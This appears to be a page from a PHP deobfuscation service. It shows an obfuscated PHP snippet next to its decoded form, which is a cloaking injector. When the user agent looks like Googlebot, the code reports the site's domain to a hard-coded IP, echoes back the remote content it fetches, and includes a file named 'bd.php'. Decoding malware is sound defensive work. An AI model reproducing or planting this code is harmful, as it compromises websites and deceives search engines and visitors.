Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto OWdl4; EOnfz: $botbotbotbot = str_replace("\40", "\x2d", $botbotbotbot); ..
Decoded Output download
<?php
goto OWdl4;
EOnfz: $botbotbotbot = str_replace(" ", "-", $botbotbotbot);
goto Ja0kh; Ja0kh: if (strpos($botbotbotbot, "oogle")) {
$xxx = base64_decode("NjU=");
$xxx1 = base64_decode("MjE=");
$xxx2 = base64_decode("MjM1");
$xxx3 = base64_decode("MjUx");
$xxx4 = base64_decode("aW5wdXQ=");
$xxx0 = base64_decode("aHR0cDovLw==");
$xxx00 = $xxx . "." . $xxx1 . "." . $xxx2 . "." . $xxx3; $xxx11 = $xxx4 . "/?useragent=" . $botbotbotbot . "&domain=" .
$_SERVER["HTTP_HOST"];
$url = $xxx0 . $xxx00 . "/" . $xxx11; $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "href=") < 1) {
$result = file_get_contents("{$url}"); echo $result; } if (strpos($result, "href=") < 1) {
$url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr} ({$errno})<br />\xa"; } else { $req = "/" . $xxx11; $out = "GET {$req} HTTP/1.0
"; $out .= "Host: {$url}\xd\xa"; $out .= "Connection: Close
\xa\xd
"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; echo $text; } } goto RVU5T; jx7Nf: $botbotbotbot = "..." . $_SERVER["HTTP_USER_AGENT"]; goto EOnfz; eVUpf: ob_end_flush(); goto FIM71; FIM71: error_reporting(0); goto jx7Nf; OWdl4: ob_implicit_flush(true); goto eVUpf; RVU5T: ?><?php include("bd.php"); ?>
<? error_reporting( E_ERROR ); ?>
Did this file decode correctly?
Original Code
<?php
goto OWdl4;
EOnfz: $botbotbotbot = str_replace("\40", "\x2d", $botbotbotbot);
goto Ja0kh; Ja0kh: if (strpos($botbotbotbot, "\157\x6f\x67\x6c\145")) {
$xxx = base64_decode("\x4e\152\125\x3d");
$xxx1 = base64_decode("\x4d\x6a\105\75");
$xxx2 = base64_decode("\115\152\115\61");
$xxx3 = base64_decode("\x4d\152\x55\x78");
$xxx4 = base64_decode("\x61\127\x35\167\x64\x58\121\75");
$xxx0 = base64_decode("\141\x48\122\x30\143\x44\x6f\x76\114\167\75\75");
$xxx00 = $xxx . "\x2e" . $xxx1 . "\56" . $xxx2 . "\56" . $xxx3; $xxx11 = $xxx4 . "\57\x3f\165\163\145\x72\x61\x67\145\x6e\164\x3d" . $botbotbotbot . "\46\x64\157\155\x61\151\x6e\x3d" .
$_SERVER["\110\124\124\120\x5f\x48\x4f\123\x54"];
$url = $xxx0 . $xxx00 . "\57" . $xxx11; $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "\x68\162\x65\146\x3d") < 1) {
$result = file_get_contents("{$url}"); echo $result; } if (strpos($result, "\x68\x72\145\146\x3d") < 1) {
$url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\x29\74\x62\x72\40\x2f\76\xa"; } else { $req = "\x2f" . $xxx11; $out = "\x47\105\x54\x20{$req}\40\110\124\124\x50\57\61\x2e\x30\15\12"; $out .= "\x48\157\x73\x74\x3a\40{$url}\xd\xa"; $out .= "\x43\x6f\x6e\156\x65\x63\x74\151\x6f\156\x3a\40\103\154\157\x73\145\15\xa\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; echo $text; } } goto RVU5T; jx7Nf: $botbotbotbot = "\56\x2e\x2e" . $_SERVER["\x48\124\124\x50\137\x55\123\x45\122\x5f\101\x47\x45\116\124"]; goto EOnfz; eVUpf: ob_end_flush(); goto FIM71; FIM71: error_reporting(0); goto jx7Nf; OWdl4: ob_implicit_flush(true); goto eVUpf; RVU5T: ?><?php include("bd.php"); ?>
<? error_reporting( E_ERROR ); ?>
Function Calls
None |
Stats
MD5 | aff0a014f99bc1999ed4dbdff7ffc9a7 |
Eval Count | 0 |
Decode Time | 71 ms |